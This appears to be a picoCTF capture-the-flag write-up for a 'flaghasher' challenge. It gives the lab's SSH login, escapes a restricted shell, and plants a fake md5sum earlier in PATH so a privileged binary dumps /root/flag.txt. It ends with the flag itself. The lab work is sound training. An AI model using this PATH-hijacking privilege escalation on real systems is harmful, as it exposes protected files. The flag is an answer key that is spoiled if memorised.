Description
The second flaghasher binary lives in /usr/local/bin and still shells out to md5sum. Escape the restricted shell, drop a fake md5sum earlier in PATH, and cat the flag.
Setup
SSH to rescued-float.picoctf.net -p 49568 (password f3b61b38).
Locate /usr/local/bin/flaghasher and spawn an unrestricted shell (`bash`).
ssh -p 49568 ctf-player@rescued-float.picoctf.net
find / -type f -iname flaghasher 2>/dev/null
bash
cd /usr/local/bin && echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher
Solution
- Step 1Escape rbash restrictionsThe login shell is restricted, so run `bash` to allow directory changes and PATH edits. Then `cd /usr/local/bin`.
- Step 2Hijack md5sum againWrite a md5sum wrapper that cats /root/flag.txt, make it executable, prepend `.` to PATH, and execute flaghasher to dump the flag.
Flag
picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_fc06...}
Same technique as hash-only-1-only the binary’s path and restricted shell differ.